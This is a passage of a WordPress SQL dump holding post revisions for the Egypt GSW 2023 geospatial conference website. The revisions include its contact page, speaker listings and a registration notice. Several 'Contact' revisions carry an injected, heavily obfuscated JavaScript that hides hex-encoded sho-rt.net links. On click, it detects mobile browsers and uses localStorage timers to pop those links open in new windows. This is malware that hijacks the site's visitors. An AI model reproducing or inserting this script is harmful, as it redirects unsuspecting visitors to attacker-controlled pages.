_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Contact','','inherit','closed','closed','','53-revision-v1','','','2022-10-07 00:29:23','2022-10-07 00:29:23','',53,'https://gsw2023.com/?p=2366',0,'revision','',0),
(2367,1,'2022-10-07 00:38:55','2022-10-07 00:38:55','[vc_row equal_height=\"yes\" content_placement=\"top\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Get In Touch!\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][/vc_column][vc_column][vc_row_inner equal_height=\"yes\" content_placement=\"top\"][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746397816{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"2364\" onclick=\"custom_link\" image_link=\"https://www.google.com/maps/@30.043056,31.232,16z?hl=en\" custom_link_target=\"_blank\" width=\"600\" css=\".vc_custom_1665134722899{padding-bottom: 30px !important;}\"][vc_column_text css=\".vc_custom_1665135195655{padding-bottom: 20px !important;}\"]\r\n<p style=\"text-align: center;\"><strong>Arab Academy for Science, Technology and Maritime Transport</strong>\r\nWe\'d love to hear from you and this is how you can reach us...</p>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1665135234836{padding-bottom: 20px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>CALL US</strong></span>\r\n2(012) 1000-7979</p>\r\n[/vc_column_text][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>MAIL</strong></span>\r\ninfo@gsw2023.com</p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746388981{padding-bottom: 50px !important;}\"][dt_contact_form fields=\"name,email,telephone,country,message\" message_height=\"9\" required=\"name,email,telephone,country,message\" terms=\"y\" terms_msg=\"QnklMjB1c2luZyUyMHRoaXMlMjBmb3JtJTIweW91JTIwYWdyZWUlMjB3aXRoJTIwdGhlJTIwc3RvcmFnZSUyMGFuZCUyMGhhbmRsaW5nJTIwb2YlMjB5b3VyJTIwZGF0YSUyMGJ5JTIwdGhpcyUyMHdlYnNpdGUu\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Contact','','inherit','closed','closed','','53-revision-v1','','','2022-10-07 00:38:55','2022-10-07 00:38:55','',53,'https://gsw2023.com/?p=2367',0,'revision','',0),
(2368,1,'2022-10-07 00:40:08','2022-10-07 00:40:08','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%20https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 